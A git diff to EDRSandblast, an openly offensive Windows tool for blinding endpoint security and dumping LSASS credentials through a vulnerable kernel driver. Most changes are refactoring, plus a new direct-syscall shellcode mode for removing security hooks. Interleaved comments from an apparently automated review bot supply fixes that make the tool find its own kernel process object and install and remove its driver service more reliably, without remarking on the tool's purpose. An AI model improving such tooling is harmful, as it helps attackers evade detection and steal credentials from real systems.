diff --git a/EDRSandblast/EDRSandBlast.h b/EDRSandblast/EDRSandBlast.h
index 36a738d..62329a8 100644
--- a/EDRSandblast/EDRSandBlast.h
+++ b/EDRSandblast/EDRSandBlast.h
@@ -12,19 +12,18 @@
 #include
 #include
 
-#include "Includes/Globals.h"
-#include "Includes/CredGuard.h"
-#include "Includes/DriverOps.h"
-#include "Includes/ETWThreatIntel.h"
-#include "Includes/FileVersion.h"
-#include "Includes/KernelCallbacks.h"
-#include "Includes/KernelMemoryPrimitives.h"
-#include "Includes/KernelPatternSearch.h"
-#include "Includes/LSASSDump.h"
-#include "Includes/NtoskrnlOffsets.h"
-#include "Includes/RunAsPPL.h"
-#include "Includes/WdigestOffsets.h"
-#include "Includes/UserlandHooks.h"
+#include "CredGuard.h"
+#include "DriverOps.h"
+#include "ETWThreatIntel.h"
+#include "FileVersion.h"
+#include "KernelCallbacks.h"
+#include "KernelMemoryPrimitives.h"
+#include "KernelPatternSearch.h"
+#include "LSASSDump.h"
+#include "NtoskrnlOffsets.h"
+#include "RunAsPPL.h"
+#include "WdigestOffsets.h"
+#include "UserlandHooks.h"
 
 typedef enum _START_MODE {
 dump,
diff --git a/EDRSandblast/EDRSandblast.c b/EDRSandblast/EDRSandblast.c
index 0c385fc..e5a9aaa 100644
--- a/EDRSandblast/EDRSandblast.c
+++ b/EDRSandblast/EDRSandblast.c
@@ -38,6 +38,8 @@ Actions mode:\n\
 \t4 Loads an additional version of ntdll library into memory, and use the (hopefully\n\
 \t unmonitored) version of NtProtectVirtualMemory present in this library to remove all\n\
 \t present userland hooks.\n\
+\t5 Allocates a shellcode that uses a direct syscall to call NtProtectVirtualMemory,\n\
+\t and uses it to remove all detected hooks\n\
 \n\
 Other options:\n\
 \n\
@@ -492,7 +494,7 @@ Other options:\n\
 status = UninstallVulnerableDriver();
 if (status == FALSE) {
 _tprintf(TEXT("[!] An error occured while attempting to uninstall the vulnerable driver\n"));
-_tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), serviceName);
+_tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), GetServiceName());
 lpExitCode = EXIT_FAILURE;
 }
 else {
diff --git a/EDRSandblast/EDRSandblast.vcxproj b/EDRSandblast/EDRSandblast.vcxproj
index 0afe1bd..96833f6 100644
--- a/EDRSandblast/EDRSandblast.vcxproj
+++ b/EDRSandblast/EDRSandblast.vcxproj
@@ -125,7 +125,7 @@ _DEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreadedDebug - Includes/ + Includes\ Console
@@ -174,7 +174,6 @@ -
diff --git a/EDRSandblast/EDRSandblast.vcxproj.filters b/EDRSandblast/EDRSandblast.vcxproj.filters
index 488530f..614e3eb 100644
--- a/EDRSandblast/EDRSandblast.vcxproj.filters
+++ b/EDRSandblast/EDRSandblast.vcxproj.filters
@@ -98,9 +98,6 @@ Header Files - - Header Files - Header Files
diff --git a/EDRSandblast/Includes/CredGuard.h b/EDRSandblast/Includes/CredGuard.h
index 16f2c56..6ff7179 100644
--- a/EDRSandblast/Includes/CredGuard.h
+++ b/EDRSandblast/Includes/CredGuard.h
@@ -6,7 +6,6 @@
 #include
 #include
 
-#include "Globals.h"
 #include "WdigestOffsets.h"
 
 DWORD WINAPI disableCredGuardByPatchingLSASS(void);
diff --git a/EDRSandblast/Includes/DriverOps.h b/EDRSandblast/Includes/DriverOps.h
index baf76b3..88ee272 100644
--- a/EDRSandblast/Includes/DriverOps.h
+++ b/EDRSandblast/Includes/DriverOps.h
@@ -11,8 +11,8 @@
 #include
 #include
 #include
+#include
 
-#include "Globals.h"
 
 #if !defined(PRINT_ERROR_AUTO)
 #define PRINT_ERROR_AUTO(func) (_tprintf(TEXT("[!] ERROR ") TEXT(__FUNCTION__) TEXT(" ; ") func TEXT(" (0x%08x)\n"), GetLastError()))
diff --git a/EDRSandblast/Includes/ETWThreatIntel.h b/EDRSandblast/Includes/ETWThreatIntel.h
index 6b6de81..77d1ad8 100644
--- a/EDRSandblast/Includes/ETWThreatIntel.h
+++ b/EDRSandblast/Includes/ETWThreatIntel.h
@@ -11,7 +11,6 @@
 #include
 #include
 
-#include "Globals.h"
 #include "KernelMemoryPrimitives.h"
 #include "NtoskrnlOffsets.h"
 
diff --git a/EDRSandblast/Includes/Globals.h b/EDRSandblast/Includes/Globals.h
deleted file mode 100644
index 7846594..0000000
--- a/EDRSandblast/Includes/Globals.h
+++ /dev/null
@@ -1,9 +0,0 @@
-#pragma once
-
-extern union NtoskrnlOffsets ntoskrnlOffsets;
-
-extern union WdigestOffsets wdigestOffsets;
-
-//extern TCHAR* serviceName;
-
-extern TCHAR* serviceName;
\ No newline at end of file
diff --git a/EDRSandblast/Includes/KernelCallbacks.h b/EDRSandblast/Includes/KernelCallbacks.h
index f81c1d7..1e902bc 100644
--- a/EDRSandblast/Includes/KernelCallbacks.h
+++ b/EDRSandblast/Includes/KernelCallbacks.h
@@ -11,7 +11,6 @@
 #include
 #include
 
-#include "Globals.h"
 #include "DriverOps.h"
 #include "KernelMemoryPrimitives.h"
 #include "NtoskrnlOffsets.h"
diff --git a/EDRSandblast/Includes/KernelMemoryPrimitives.h b/EDRSandblast/Includes/KernelMemoryPrimitives.h
index 4f7b641..1383aff 100644
--- a/EDRSandblast/Includes/KernelMemoryPrimitives.h
+++ b/EDRSandblast/Includes/KernelMemoryPrimitives.h
@@ -12,7 +12,6 @@
 #include
 #include
 
-#include "Globals.h"
 
 struct RTCORE64_MSR_READ {
 DWORD Register;
diff --git a/EDRSandblast/Includes/NtoskrnlOffsets.h b/EDRSandblast/Includes/NtoskrnlOffsets.h
index 5cdc974..92b9770 100644
--- a/EDRSandblast/Includes/NtoskrnlOffsets.h
+++ b/EDRSandblast/Includes/NtoskrnlOffsets.h
@@ -10,7 +10,6 @@
 #include
 #include
 
-#include "Globals.h"
 #include "FileVersion.h"
 
 enum NtoskrnlOffsetType {
diff --git a/EDRSandblast/Includes/RunAsPPL.h b/EDRSandblast/Includes/RunAsPPL.h
index 1c93825..eb73ac2 100644
--- a/EDRSandblast/Includes/RunAsPPL.h
+++ b/EDRSandblast/Includes/RunAsPPL.h
@@ -12,7 +12,6 @@
 #include
 #include
 
-#include "Globals.h"
 #include "KernelMemoryPrimitives.h"
 #include "NtoskrnlOffsets.h"
 
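Review bot: With Globals.h deleted, the declarations `extern union NtoskrnlOffsets ntoskrnlOffsets;` and `extern union WdigestOffsets wdigestOffsets;` disappear, yet this NtoskrnlOffsets.h hunk and the WdigestOffsets.h hunk only drop the `#include "Globals.h"` line and add nothing in their place. Unless the two externs already exist further down these headers (outside the hunks), every translation unit that reached the offset tables through Globals.h now fails to compile with an undeclared identifier. If they are absent, add `extern union NtoskrnlOffsets ntoskrnlOffsets;` after the union definition in NtoskrnlOffsets.h and `extern union WdigestOffsets wdigestOffsets;` after its counterpart in WdigestOffsets.h, which keeps each table declared next to its type instead of in a shared globals header.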
diff --git a/EDRSandblast/Includes/WdigestOffsets.h b/EDRSandblast/Includes/WdigestOffsets.h
index e690403..00dc050 100644
--- a/EDRSandblast/Includes/WdigestOffsets.h
+++ b/EDRSandblast/Includes/WdigestOffsets.h
@@ -11,7 +11,6 @@
 #include
 #include
 
-#include "Globals.h"
 #include "FileVersion.h"
 
 enum WdigestOffsetType {
diff --git a/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c b/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c
index 5cf087c..7dcd469 100644
--- a/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c
+++ b/EDRSandblast/LSASSProtectionBypass/RunAsPPL.c
@@ -14,7 +14,7 @@ DWORD64 GetSelfEPROCESSAddress(BOOL verbose) {
 // Open an handle to our own process.
 HANDLE selfProcessHandle = OpenProcess(SYNCHRONIZE, FALSE, currentProcessID);
 if (verbose) {
-_tprintf(TEXT("[*] Self process handle: 0x%hx\n"), (USHORT)selfProcessHandle);
+_tprintf(TEXT("[*] Self process handle: 0x%hx\n"), (USHORT)((ULONG_PTR)selfProcessHandle));
 }
 
 
@@ -72,7 +72,7 @@ DWORD64 GetSelfEPROCESSAddress(BOOL verbose) {
 _tprintf(TEXT("[*] Handle for the current process (PID: %hd): 0x%hx at 0x%I64x\n"), handleInfo.UniqueProcessId, handleInfo.HandleValue, (DWORD64)handleInfo.Object);
 }
 
-if (handleInfo.HandleValue == (USHORT)selfProcessHandle) {
+if (handleInfo.HandleValue == (USHORT)((ULONG_PTR)selfProcessHandle)) {
 _tprintf(TEXT("[+] Found the handle of the current process (PID: %hd): 0x%hx at 0x%I64x\n"), handleInfo.UniqueProcessId, handleInfo.HandleValue, (DWORD64)handleInfo.Object);
 returnAddress = (DWORD64)handleInfo.Object;
 }
diff --git a/EDRSandblast/Utils/DriverOps.c b/EDRSandblast/Utils/DriverOps.c
index 0a71721..2f5762c 100644
--- a/EDRSandblast/Utils/DriverOps.c
+++ b/EDRSandblast/Utils/DriverOps.c
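Review bot: The new cast in `if (handleInfo.HandleValue == (USHORT)((ULONG_PTR)selfProcessHandle))` only silences the truncation warning; the comparison still uses the low 16 bits of the handle, so any other table entry whose handle value shares those bits matches as well, and `returnAddress` is overwritten on every match with no break visible in the hunk. Since the value returned is used as this process's kernel object address, a spurious match silently yields the wrong address. If the entry is not already filtered on `handleInfo.UniqueProcessId == currentProcessID` outside the hunk, add that check before the handle comparison, and consider enumerating with SystemExtendedHandleInformation, whose entries carry a full-width HandleValue, so `(ULONG_PTR)selfProcessHandle` can be compared without truncation; the same cast in the hunk at line 14 only feeds a `%hx` print and is harmless. The enclosing loop and GetSelfEPROCESSAddress both start and end outside the hunk.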
@@ -42,7 +42,6 @@ BOOL ServiceAddEveryoneAccess(SC_HANDLE serviceHandle) {
 }
 
 DWORD ServiceInstall(PCTSTR serviceName, PCTSTR displayName, PCTSTR binPath, DWORD serviceType, DWORD startType, BOOL startIt) {
-BOOL status = FALSE;
 SC_HANDLE hSC = NULL, hS = NULL;
 
 hSC = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE);
@@ -179,7 +178,7 @@ BOOL ServiceUninstall(PCTSTR serviceName, DWORD attemptCount) {
 
 */
 static TCHAR* randString(TCHAR* str, size_t size) {
-srand(time(0));
+srand((unsigned int) time(0));
 
 const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789";
 if (size) {
@@ -192,7 +191,9 @@ static TCHAR* randString(TCHAR* str, size_t size) {
 return str;
 }
 
+
 TCHAR* serviceName;
+
 TCHAR* GetServiceName(void) {
 if (!serviceName || _tcslen(serviceName) == 0) {
 serviceName = calloc(SERVICE_NAME_LENGTH, sizeof(TCHAR));
@@ -216,11 +217,9 @@ void SetServiceName(TCHAR *newName, size_t szNewName) {
 }
 
 BOOL InstallVulnerableDriver(TCHAR* driverPath) {
-
 TCHAR* svcName = GetServiceName();
-
 const TCHAR svcDesc[] = TEXT("");
-DWORD status = ServiceInstall(serviceName, svcName, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);
+DWORD status = ServiceInstall(svcName, svcName, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);
 if (status == 0x00000005) {
 _tprintf(TEXT("[!] 0x00000005 - Access Denied when attempting to install the driver - Did you run as administrator?\n"));
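Review bot: `srand((unsigned int) time(0));` is still executed on every call to randString, so the cast fixes the conversion warning but leaves the generator reseeded from a one-second clock, and two calls within the same second return the same string. GetServiceName in the next hunk appears to be where this string becomes the service name that ServiceInstall receives and that the `sc delete %s` hint later prints, so a repeated name can make install and cleanup act on the wrong service. Seed once instead, e.g. `static BOOL seeded = FALSE;` followed by `if (!seeded) { srand((unsigned int) time(0)); seeded = TRUE; }`, or move the seeding to program start-up; the rest of randString's body lies past the hunk. Separately, the `charset` string omits `0`, which looks deliberate but deserves a one-line comment saying why.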
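Review bot: `TCHAR* serviceName;` retains external linkage although this commit deletes the `extern TCHAR* serviceName;` declaration from Globals.h and makes EDRSandblast.c go through GetServiceName(); declare it `static TCHAR* serviceName = NULL;` so the accessor is the only route to it, provided no other translation unit still declares its own extern. The parameter named `serviceName` in `DWORD ServiceInstall(PCTSTR serviceName, ...)` (hunk at line 42) and in ServiceUninstall shadows this global, which is presumably how the `ServiceInstall(serviceName, svcName, ...)` call corrected in the last hunk came about; renaming the parameter to `svcName` lets the compiler's shadowing warning catch the next one. Also `serviceName = calloc(SERVICE_NAME_LENGTH, sizeof(TCHAR));` is never checked; add `if (!serviceName) return NULL;` right after it and let the `sc delete %s` message in EDRSandblast.c cope with a NULL result. GetServiceName's body continues past the hunk.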